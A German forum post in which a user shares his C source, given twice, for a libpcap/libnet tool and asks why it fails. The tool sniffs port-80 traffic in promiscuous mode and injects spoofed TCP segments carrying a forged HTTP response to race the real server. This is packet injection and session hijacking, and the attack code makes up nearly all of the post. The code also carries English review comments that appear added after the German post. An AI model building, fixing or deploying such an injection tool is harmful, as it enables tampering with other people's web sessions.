pakete injecten per libnet...

Flas

hi, ich hab mal wieder ein problem, ich habe ein kleines proggie geschrieben das nach tcp packeten snifft, die zielport 80 haben, fängt der data teil dieser pakete mit einem "GET" oder "POST" an, so versucht es der serverantwort zuvor zu kommen und schickt eine testantwort.
nun, alles schön und gut, geht auch wunderbar, gibt keine fehler etc. aber es scheint trotzdem nichts zu senden auch wenn es regelmässig:

"[+] construction and injection completed, wrote all %d bytes"

sagt, naja, ich kann zumindest kein paket ersniffen. Wenn es jetzt nur beim browser nicht angenommen würde, dann würde ich sagen ich müsste die ack-nummer noch der session anpassen, aber so - keine Ahnung :(

das ganze ist schon ne ganze weile in arbeit, so wollte ich das endlich mal hinbekommen, ist nichts weltbewegend wichtiges, aber es sollte doch möglich sein!? wäre für tipps und hilfe sehr dankbar.

(libpcap und libnet sind erforderlich zum compilen)

hier alles in farbe -> http://phpfi.com/63494

Code:
//  gcc -lpcap -Wall `libnet-config --defines` sniff.c `libnet-config --libs` -I/usr/local/include -L/usr/local/lib

#include <stdio.h>
#include <sys/types.h>  
#include <sys/socket.h>     
#include <netdb.h>
#include <netinet/in.h>     
#include <netinet/tcp.h>
#include <arpa/inet.h>      
#include <stdlib.h>
#include <netinet/in_systm.h>

#define __GLIBC__ 1

#include <pcap.h>           
#include <libnet.h>  
#include <netinet/ip.h>
#include <netinet/if_ether.h>

void my_callback(u_char*,const struct pcap_pkthdr*,const u_char*);
int send_raw(char*, char*, int*, int*, char *data, int);
int wildcmp(char *, char *);

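/*
 * Entry point: open the capture device, install the "tcp dst port 80" filter
 * and hand every matching frame to my_callback() until pcap_loop() returns.
 *
 * argv[1] optionally names the capture device (default "rl0").  Opening a
 * device in promiscuous mode needs the platform's capture privilege.
 *
 * Exit status: 0 on a clean run, 1/2/3 when opening the device, compiling or
 * installing the filter fails, 5 when pcap_loop() itself reports an error.
 * (Exit status 4 is reserved for my_callback(), which calls exit(4) when a
 * send fails.)
 */
int main(int argc, char **argv) {
    pcap_t *descr;                              /* Session handle */
    char *dev = (argc > 1) ? argv[1] : "rl0";   /* The device to sniff on */
    char f[] = "tcp dst port 80";               /* BPF filter expression */
    char errbuf[PCAP_ERRBUF_SIZE] = "";         /* Error string filled in by libpcap */
    struct bpf_program fp;                      /* hold compiled program */
    bpf_u_int32 maskp = 0;                      /* subnet mask */
    bpf_u_int32 netp = 0;                       /* ip */
    int rc = 0;

    /* pcap_lookupnet() leaves netp/maskp untouched on failure; keep the
       zero fallback instead of compiling the filter against an
       uninitialized netmask. */
    if (pcap_lookupnet(dev, &netp, &maskp, errbuf) == -1) {
        fprintf(stderr, "[-] pcap_lookupnet() failed: %s\n", errbuf);
        netp = 0;
        maskp = 0;
    }

    /* libpcap reports failures through errbuf / pcap_geterr(), not errno,
       so perror() would print an unrelated message. */
    descr = pcap_open_live(dev, BUFSIZ, 1, 1, errbuf);
    if (descr == NULL) {
        fprintf(stderr, "[-] pcap_open_live() failed: %s\n", errbuf);
        return 1;
    }

    if (pcap_compile(descr, &fp, f, 0, netp) == -1) {
        fprintf(stderr, "[-] pcap_compile() failed: %s\n", pcap_geterr(descr));
        rc = 2;
        goto out_close;
    }

    if (pcap_setfilter(descr, &fp) == -1) {
        fprintf(stderr, "[-] pcap_setfilter() failed: %s\n", pcap_geterr(descr));
        rc = 3;
        goto out_free;
    }

    printf("[!] starting sniffing...\n\n");

    /* cnt == 0: run until an error or pcap_breakloop(); -1 signals an error. */
    if (pcap_loop(descr, 0, my_callback, NULL) == -1) {
        fprintf(stderr, "[-] pcap_loop() failed: %s\n", pcap_geterr(descr));
        rc = 5;
    }

    printf("[!] finished sniffing\n");

out_free:
    pcap_freecode(&fp);     /* release the compiled filter (previously leaked) */
out_close:
    pcap_close(descr);
    return rc;
}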

/*
 * pcap_loop() callback: parse one captured frame and, when the TCP payload
 * starts like an HTTP request line, hand a canned reply to send_raw().
 *
 * useless - user pointer from pcap_loop(); main() passes NULL and it is unused.
 * header  - capture metadata; not consulted, so header->caplen never bounds
 *           any of the reads below (see the NOTE(review) comments).
 * packet  - the raw frame bytes as captured.
 *
 * No return value.  If send_raw() reports failure the whole process exit(4)s.
 */
void my_callback(u_char *useless,const struct pcap_pkthdr *header,const u_char *packet) {
    static int count = 1;       /* incremented per frame but never read */
    struct ip* ip_hdr;          /* IPv4 header, assumed right after the Ethernet header */
    struct tcphdr* tcp_hdr;     /* TCP header, assumed right after a 20-byte IPv4 header */
    char src_ip[100], dst_ip[100];  /* dotted-quad text of both endpoints */
    int src_port, dst_port;         /* host-order TCP ports */

    /* Assumes an Ethernet link layer: the filter in main() only guarantees
       "tcp dst port 80", not the link type of the device. */
    ip_hdr = (struct ip*) (packet + sizeof(struct ether_header));

    inet_ntop(AF_INET, &ip_hdr->ip_src, src_ip, sizeof(src_ip));
    inet_ntop(AF_INET, &ip_hdr->ip_dst, dst_ip, sizeof(dst_ip));

    /* NOTE(review): sizeof(struct ip) is the minimal 20-byte header; ip_hl is
       not consulted, so a packet carrying IP options is mis-parsed here.
       Nothing compares these offsets against header->caplen either, so a
       short capture reads past the captured bytes. */
    tcp_hdr = (struct tcphdr*)(packet + sizeof(struct ip) + sizeof(struct ether_header));
    src_port = ntohs(tcp_hdr->th_sport);
    dst_port = ntohs(tcp_hdr->th_dport);

    printf("src %s:%d -> dst %s:%d\n",src_ip, src_port, dst_ip, dst_port);


    /* Only segments with PSH set are inspected. */
    if(tcp_hdr->th_flags & TH_PUSH) {
        /* Same fixed-size assumption as above: th_off is ignored, so TCP
           options shift the real payload start past this pointer. */
        char *data = (char*) (packet + sizeof(struct tcphdr) + sizeof(struct ip) + sizeof(struct ether_header) );
        /* NOTE(review): wildcmp() walks its first argument until a '\0'.
           Packet payload is not NUL-terminated, so the comparison can run
           beyond the end of the captured frame. */
        if(wildcmp(data,"GET*") || wildcmp(data,"POST*")) {
            printf("\n[!] found a suitable connection\n");
            /* sizeof payload includes the terminating '\0', which is sent too. */
            char payload[] = "HTTP/1.1 200 OK\nConnection: close\nContent-Type: text/html\n\n<html><head><title>TEST</title></head><body><h1>THIS IS JUST A TEST\nGUYS!!</h1>";
            /* Addresses and ports are swapped so the reply goes back to the
               captured sender; a non-zero result ends the whole program. */
            if(send_raw( dst_ip, src_ip, &dst_port, &src_port,payload,sizeof payload)) 
                exit(4);
        }

    }

    count++;
}

/*
 * Build one IPv4/TCP segment carrying `data` with the libnet 1.0 API and
 * write it through a raw socket.
 *
 * srcip, dstip       - dotted-quad strings, resolved via libnet_name_resolve().
 * src_port, dst_port - host-order ports; passed by pointer but only read once,
 *                      so plain ints would serve the same purpose.
 * data, datalen      - bytes copied into the TCP payload by libnet_build_tcp().
 *
 * Returns EXIT_FAILURE only when libnet_write_ip() returned -1; a short write
 * is logged as a warning but still yields EXIT_SUCCESS.  Every other failure
 * goes through LIBNET_ERR_FATAL, which in libnet 1.0 terminates the process,
 * so the fatal branches below do not need an explicit return.  Opening the
 * raw socket normally requires raw-socket privilege.
 */
int send_raw(char *srcip, char *dstip, int *src_port, int *dst_port, char *data, int datalen) {
    int network, packet_size, c;    /* raw socket fd, bytes to send, bytes written */
    u_long src_ip, dst_ip;          /* addresses as returned by libnet_name_resolve() */
    u_short src_prt, dst_prt;       /* ports handed to libnet_build_tcp() */
    u_char *packet;                 /* buffer owned by libnet_init_packet()/libnet_destroy_packet() */

    src_ip  = 0;
    dst_ip  = 0;
    src_prt = 0;
    dst_prt = 0;

    dst_prt = *dst_port;
    /* NOTE(review): optarg is the getopt(3) global; nothing in this program
       calls getopt(), so it does not name the address that failed and may be
       a null pointer when formatted with %s.  dstip / srcip are the values
       these messages mean to print. */
    if (!(dst_ip = libnet_name_resolve(dstip, LIBNET_RESOLVE))) {
        libnet_error(LIBNET_ERR_FATAL, "\n[-] bad destination IP address: %s\n", optarg);
    }

    src_prt = *src_port;
    if (!(src_ip = libnet_name_resolve(srcip, LIBNET_RESOLVE))) {
        libnet_error(LIBNET_ERR_FATAL, "\n[-] bad source IP address: %s\n", optarg);
    }

    /* Port 0 and address 0 count as "not set".  The resolve failures above
       have already exited, so in practice this only rejects port 0. */
    if (!src_ip || !src_prt || !dst_ip || !dst_prt) {
        printf("\n[-] problems with greping addr's\n");
        exit(1);
    }

    packet_size = LIBNET_IP_H + LIBNET_TCP_H + datalen;

    /* libnet_init_packet() allocates packet_size bytes into `packet`;
       they are released by libnet_destroy_packet() at the end. */
    libnet_init_packet(packet_size, &packet);
    if (packet == NULL) {
        libnet_error(LIBNET_ERR_FATAL, "\n[-] libnet_init_packet failed\n");
    }

    /* Raw IP socket: the IP header is supplied by the code below. */
    network = libnet_open_raw_sock(IPPROTO_RAW);
    if (network == -1) {
        libnet_error(LIBNET_ERR_FATAL, "\n[-] can't open network.\n");
    }

    if (libnet_build_ip(LIBNET_TCP_H,   /* size of the packet sans IP header */
        IPTOS_LOWDELAY,                 /* IP tos */
        242,                            /* IP ID */
        0,                              /* frag stuff */
        48,                             /* TTL */
        IPPROTO_TCP,                    /* transport protocol */
        src_ip,                         /* source IP */
        dst_ip,                         /* destination IP */
        NULL,                           /* payload (none) */
        0,                              /* payload length */
        packet) == -1) {                /* packet header memory */
            libnet_error(LIBNET_ERR_FATAL, "\n[-] libnet_build_ip failed\n");
    }

    if (libnet_build_tcp(src_prt,       /* source TCP port */
        dst_prt,                        /* destination TCP port */
        0xa1d95,                        /* sequence number (fixed constant) */
        0x53,                           /* acknowledgement number (fixed constant) */
        TH_ACK,                         /* control flags */
        1024,                           /* window size */
        0,                              /* urgent pointer */
        data,                           /* payload */
        datalen,                        /* payload length */
        packet + LIBNET_IP_H) == -1) {  /* TCP header starts right after the IP header */
            libnet_error(LIBNET_ERR_FATAL, "\n[-] libnet_build_tcp failed\n");
    }

    /* Fill in the TCP checksum field of the packet built above. */
    if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1) {
        libnet_error(LIBNET_ERR_FATAL, "\n[-] libnet_do_checksum failed\n");
    }

//    strncpy(packet + LIBNET_IP_H + LIBNET_TCP_H, data, sizeof(packet) - LIBNET_IP_H + LIBNET_TCP_H);

    c = libnet_write_ip(network, packet, packet_size);

    /* A short write is only warned about; see the return value below. */
    if (c < packet_size) {
        libnet_error(LN_ERR_WARNING, "\n[-] libnet_write_ip only wrote %d bytes\n", c);
    }
    else {
        printf("\n[+] construction and injection completed, wrote all %d bytes\n\n", c);
    }

    /* Cleanup: release the raw socket and the packet buffer. */

    if (libnet_close_raw_sock(network) == -1) {
        libnet_error(LN_ERR_WARNING, "[-] libnet_close_raw_sock couldn't close the interface");
    }

    libnet_destroy_packet(&packet);

    /* Only a write error (-1) is reported as failure; partial writes are not. */
    return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}

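/*
 * Glob-style match of string1 against the pattern string2, where '*' matches
 * any run of characters (including none) and every other byte matches itself.
 *
 * Both arguments must be NUL-terminated C strings: the scan stops only at a
 * '\0', so a caller holding raw packet bytes has to terminate or bound them
 * first.  Returns 1 on a match, 0 otherwise; a NULL argument never matches.
 *
 * Uses the single-backtrack-point scheme: on a mismatch the most recent '*'
 * absorbs one more byte of string1 and matching resumes after it.  The
 * earlier version gave up as soon as the pattern was exhausted instead of
 * backtracking, so e.g. "acbc" against "a*c" was wrongly reported as 0.
 */
int wildcmp(char *string1, char *string2){
    const char *s = string1;        /* cursor into the subject */
    const char *p = string2;        /* cursor into the pattern */
    const char *star_p = NULL;      /* pattern position just after the last '*' seen */
    const char *star_s = NULL;      /* subject position that '*' currently reaches */

    if (string1 == NULL || string2 == NULL) {
        return 0;
    }

    while (*s != '\0') {
        if (*p == '*') {
            /* Remember where to resume if the remainder fails to match. */
            star_p = ++p;
            star_s = s;
        } else if (*p == *s) {
            p++;
            s++;
        } else if (star_p != NULL) {
            /* Let the last '*' swallow one more subject byte and retry. */
            p = star_p;
            s = ++star_s;
        } else {
            return 0;
        }
    }

    /* Subject consumed: only trailing '*'s may remain in the pattern. */
    while (*p == '*') {
        p++;
    }
    return *p == '\0';
}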

mfg, Flas!!
 
sooo, hab nun mal die ack und seq nummern auch entsprechend angepasst (vielen dank an akerit), das ganze sieht nun so aus, aber injectet immer noch nicht, trotz keinerlei fehler:

--> http://phpfi.com/63620

Code:
//  gcc -lpcap -Wall `libnet-config --defines` sniff.c `libnet-config --libs` -I/usr/local/include -L/usr/local/lib

#include <stdio.h>
#include <sys/types.h>  
#include <sys/socket.h>     
#include <netdb.h>
#include <netinet/in.h>     
#include <netinet/tcp.h>
#include <arpa/inet.h>      
#include <stdlib.h>
#include <netinet/in_systm.h>

#define __GLIBC__ 1

#include <pcap.h>           
#include <libnet.h>  
#include <netinet/ip.h>
#include <netinet/if_ether.h>

void my_callback(u_char*,const struct pcap_pkthdr*,const u_char*);
int send_raw(char*, char*, int*, int*, char *data, int, u_long, u_long);
int wildcmp(char *, char *);

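/*
 * Entry point: open the capture device, install the "tcp dst port 80" filter
 * and hand every matching frame to my_callback() until pcap_loop() returns.
 *
 * argv[1] optionally names the capture device (default "rl0").  Opening a
 * device in promiscuous mode needs the platform's capture privilege.
 *
 * Exit status: 0 on a clean run, 1/2/3 when opening the device, compiling or
 * installing the filter fails, 5 when pcap_loop() itself reports an error.
 * (Exit status 4 is reserved for my_callback(), which calls exit(4) when a
 * send fails.)
 */
int main(int argc, char **argv) {
    pcap_t *descr;                              /* Session handle */
    char *dev = (argc > 1) ? argv[1] : "rl0";   /* The device to sniff on */
    char f[] = "tcp dst port 80";               /* BPF filter expression */
    char errbuf[PCAP_ERRBUF_SIZE] = "";         /* Error string filled in by libpcap */
    struct bpf_program fp;                      /* hold compiled program */
    bpf_u_int32 maskp = 0;                      /* subnet mask */
    bpf_u_int32 netp = 0;                       /* ip */
    int rc = 0;

    /* pcap_lookupnet() leaves netp/maskp untouched on failure; keep the
       zero fallback instead of compiling the filter against an
       uninitialized netmask. */
    if (pcap_lookupnet(dev, &netp, &maskp, errbuf) == -1) {
        fprintf(stderr, "[-] pcap_lookupnet() failed: %s\n", errbuf);
        netp = 0;
        maskp = 0;
    }

    /* libpcap reports failures through errbuf / pcap_geterr(), not errno,
       so perror() would print an unrelated message. */
    descr = pcap_open_live(dev, BUFSIZ, 1, 1, errbuf);
    if (descr == NULL) {
        fprintf(stderr, "[-] pcap_open_live() failed: %s\n", errbuf);
        return 1;
    }

    if (pcap_compile(descr, &fp, f, 0, netp) == -1) {
        fprintf(stderr, "[-] pcap_compile() failed: %s\n", pcap_geterr(descr));
        rc = 2;
        goto out_close;
    }

    if (pcap_setfilter(descr, &fp) == -1) {
        fprintf(stderr, "[-] pcap_setfilter() failed: %s\n", pcap_geterr(descr));
        rc = 3;
        goto out_free;
    }

    printf("[!] starting sniffing...\n\n");

    /* cnt == 0: run until an error or pcap_breakloop(); -1 signals an error. */
    if (pcap_loop(descr, 0, my_callback, NULL) == -1) {
        fprintf(stderr, "[-] pcap_loop() failed: %s\n", pcap_geterr(descr));
        rc = 5;
    }

    printf("[!] finished sniffing\n");

out_free:
    pcap_freecode(&fp);     /* release the compiled filter (previously leaked) */
out_close:
    pcap_close(descr);
    return rc;
}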

/*
 * pcap_loop() callback: parse one captured frame and, when the TCP payload
 * starts like an HTTP request line, hand a canned reply to send_raw().
 *
 * useless - user pointer from pcap_loop(); main() passes NULL and it is unused.
 * header  - capture metadata; not consulted, so header->caplen never bounds
 *           any of the reads below (see the NOTE(review) comments).
 * packet  - the raw frame bytes as captured.
 *
 * No return value.  If send_raw() reports failure the whole process exit(4)s.
 */
void my_callback(u_char *useless,const struct pcap_pkthdr *header,const u_char *packet) {
    static int count = 1;       /* incremented per frame but never read */
    struct ip* ip_hdr;          /* IPv4 header, assumed right after the Ethernet header */
    struct tcphdr* tcp_hdr;     /* TCP header, assumed right after a 20-byte IPv4 header */
    char src_ip[100], dst_ip[100];  /* dotted-quad text of both endpoints */
    int src_port, dst_port;         /* host-order TCP ports */

    /* Assumes an Ethernet link layer: the filter in main() only guarantees
       "tcp dst port 80", not the link type of the device. */
    ip_hdr = (struct ip*) (packet + sizeof(struct ether_header));

    inet_ntop(AF_INET, &ip_hdr->ip_src, src_ip, sizeof(src_ip));
    inet_ntop(AF_INET, &ip_hdr->ip_dst, dst_ip, sizeof(dst_ip));

    /* NOTE(review): sizeof(struct ip) is the minimal 20-byte header; ip_hl is
       not consulted, so a packet carrying IP options is mis-parsed here.
       Nothing compares these offsets against header->caplen either, so a
       short capture reads past the captured bytes. */
    tcp_hdr = (struct tcphdr*)(packet + sizeof(struct ip) + sizeof(struct ether_header));
    src_port = ntohs(tcp_hdr->th_sport);
    dst_port = ntohs(tcp_hdr->th_dport);

    printf("src %s:%d -> dst %s:%d\n",src_ip, src_port, dst_ip, dst_port);


    /* Only segments with ACK set are inspected (the earlier version used PSH). */
    if(tcp_hdr->th_flags & TH_ACK) {
        /* Same fixed-size assumption as above: th_off is ignored, so TCP
           options shift the real payload start past this pointer. */
        char *data = (char*) (packet + sizeof(struct tcphdr) + sizeof(struct ip) + sizeof(struct ether_header) );
        /* NOTE(review): wildcmp() walks its first argument until a '\0'.
           Packet payload is not NUL-terminated, so the comparison can run
           beyond the end of the captured frame. */
        if(wildcmp(data,"GET*") || wildcmp(data,"POST*")) {
            printf("\n[!] found a suitable connection\n");
            /* sizeof payload includes the terminating '\0', which is sent too. */
            char payload[] = "HTTP/1.1 200 OK\nConnection: close\nContent-Type: text/html\n\n<html><head><title>TEST</title></head><body><h1>THIS IS JUST A TEST\nGUYS!!</h1>\r\n";
            /* Addresses and ports are swapped so the reply goes back to the
               captured sender; the last two arguments are taken from the
               captured TCP header.  A non-zero result ends the whole program. */
            if(send_raw( dst_ip, src_ip, &dst_port, &src_port,payload,sizeof payload,ntohl(tcp_hdr->th_ack),ntohl(tcp_hdr->th_seq)+sizeof(packet))) 
                exit(4);
        }

    }

    count++;
}

/*
 * Build one IPv4/TCP segment carrying `data` with the libnet 1.0 API and
 * write it through a raw socket.
 *
 * srcip, dstip       - dotted-quad strings, resolved via libnet_name_resolve().
 * src_port, dst_port - host-order ports; passed by pointer but only read once,
 *                      so plain ints would serve the same purpose.
 * data, datalen      - bytes copied into the TCP payload by libnet_build_tcp().
 * seq, ack           - values placed verbatim into the TCP header.
 *
 * Returns EXIT_FAILURE only when libnet_write_ip() returned -1; a short write
 * is logged as a warning but still yields EXIT_SUCCESS.  Every other failure
 * goes through LIBNET_ERR_FATAL, which in libnet 1.0 terminates the process,
 * so the fatal branches below do not need an explicit return.  Opening the
 * raw socket normally requires raw-socket privilege.
 */
int send_raw(char *srcip, char *dstip, int *src_port, int *dst_port, char *data, int datalen, u_long seq, u_long ack) {
    int network, packet_size, c;    /* raw socket fd, bytes to send, bytes written */
    u_long src_ip, dst_ip;          /* addresses as returned by libnet_name_resolve() */
    u_short src_prt, dst_prt;       /* ports handed to libnet_build_tcp() */
    u_char *packet;                 /* buffer owned by libnet_init_packet()/libnet_destroy_packet() */

    src_ip  = 0;
    dst_ip  = 0;
    src_prt = 0;
    dst_prt = 0;

    printf("seq:%lu,ack:%lu\n",seq,ack);         //for debugging

    dst_prt = *dst_port;
    /* NOTE(review): optarg is the getopt(3) global; nothing in this program
       calls getopt(), so it does not name the address that failed and may be
       a null pointer when formatted with %s.  dstip / srcip are the values
       these messages mean to print. */
    if (!(dst_ip = libnet_name_resolve(dstip, LIBNET_RESOLVE))) {
        libnet_error(LIBNET_ERR_FATAL, "\n[-] bad destination IP address: %s\n", optarg);
    }

    src_prt = *src_port;
    if (!(src_ip = libnet_name_resolve(srcip, LIBNET_RESOLVE))) {
        libnet_error(LIBNET_ERR_FATAL, "\n[-] bad source IP address: %s\n", optarg);
    }

    /* Port 0 and address 0 count as "not set".  The resolve failures above
       have already exited, so in practice this only rejects port 0. */
    if (!src_ip || !src_prt || !dst_ip || !dst_prt) {
        printf("\n[-] problems with greping addr's\n");
        exit(1);
    }

    packet_size = LIBNET_IP_H + LIBNET_TCP_H + datalen;

    /* libnet_init_packet() allocates packet_size bytes into `packet`;
       they are released by libnet_destroy_packet() at the end. */
    libnet_init_packet(packet_size, &packet);
    if (packet == NULL) {
        libnet_error(LIBNET_ERR_FATAL, "\n[-] libnet_init_packet failed\n");
    }

    /* Raw IP socket: the IP header is supplied by the code below. */
    network = libnet_open_raw_sock(IPPROTO_RAW);
    if (network == -1) {
        libnet_error(LIBNET_ERR_FATAL, "\n[-] can't open network.\n");
    }

    if (libnet_build_ip(LIBNET_TCP_H,   /* size of the packet sans IP header */
        IPTOS_LOWDELAY,                 /* IP tos */
        242,                            /* IP ID */
        0,                              /* frag stuff */
        48,                             /* TTL */
        IPPROTO_TCP,                    /* transport protocol */
        src_ip,                         /* source IP */
        dst_ip,                         /* destination IP */
        NULL,                           /* payload (none) */
        0,                              /* payload length */
        packet) == -1) {                /* packet header memory */
            libnet_error(LIBNET_ERR_FATAL, "\n[-] libnet_build_ip failed\n");
    }

    if (libnet_build_tcp(src_prt,       /* source TCP port */
        dst_prt,                        /* destination TCP port */
        seq,                            /* sequence number (from the caller) */
        ack,                            /* acknowledgement number (from the caller) */
        TH_ACK,                         /* control flags */
        1024,                           /* window size */
        0,                              /* urgent pointer */
        data,                           /* payload */
        datalen,                        /* payload length */
        packet + LIBNET_IP_H) == -1) {  /* TCP header starts right after the IP header */
            libnet_error(LIBNET_ERR_FATAL, "\n[-] libnet_build_tcp failed\n");
    }

    /* Fill in the TCP checksum field of the packet built above. */
    if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1) {
        libnet_error(LIBNET_ERR_FATAL, "\n[-] libnet_do_checksum failed\n");
    }

//    strncpy(packet + LIBNET_IP_H + LIBNET_TCP_H, data, sizeof(packet) - LIBNET_IP_H + LIBNET_TCP_H);

    c = libnet_write_ip(network, packet, packet_size);

    /* A short write is only warned about; see the return value below. */
    if (c < packet_size) {
        libnet_error(LN_ERR_WARNING, "\n[-] libnet_write_ip only wrote %d bytes\n", c);
    }
    else {
        printf("\n[+] construction and injection completed, wrote all %d bytes\n\n", c);
    }

    /* Cleanup: release the raw socket and the packet buffer. */

    if (libnet_close_raw_sock(network) == -1) {
        libnet_error(LN_ERR_WARNING, "[-] libnet_close_raw_sock couldn't close the interface");
    }

    libnet_destroy_packet(&packet);

    /* Only a write error (-1) is reported as failure; partial writes are not. */
    return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}

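/*
 * Glob-style match of string1 against the pattern string2, where '*' matches
 * any run of characters (including none) and every other byte matches itself.
 *
 * Both arguments must be NUL-terminated C strings: the scan stops only at a
 * '\0', so a caller holding raw packet bytes has to terminate or bound them
 * first.  Returns 1 on a match, 0 otherwise; a NULL argument never matches.
 *
 * Uses the single-backtrack-point scheme: on a mismatch the most recent '*'
 * absorbs one more byte of string1 and matching resumes after it.  The
 * earlier version gave up as soon as the pattern was exhausted instead of
 * backtracking, so e.g. "acbc" against "a*c" was wrongly reported as 0.
 */
int wildcmp(char *string1, char *string2){
    const char *s = string1;        /* cursor into the subject */
    const char *p = string2;        /* cursor into the pattern */
    const char *star_p = NULL;      /* pattern position just after the last '*' seen */
    const char *star_s = NULL;      /* subject position that '*' currently reaches */

    if (string1 == NULL || string2 == NULL) {
        return 0;
    }

    while (*s != '\0') {
        if (*p == '*') {
            /* Remember where to resume if the remainder fails to match. */
            star_p = ++p;
            star_s = s;
        } else if (*p == *s) {
            p++;
            s++;
        } else if (star_p != NULL) {
            /* Let the last '*' swallow one more subject byte and retry. */
            p = star_p;
            s = ++star_s;
        } else {
            return 0;
        }
    }

    /* Subject consumed: only trailing '*'s may remain in the pattern. */
    while (*p == '*') {
        p++;
    }
    return *p == '\0';
}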
 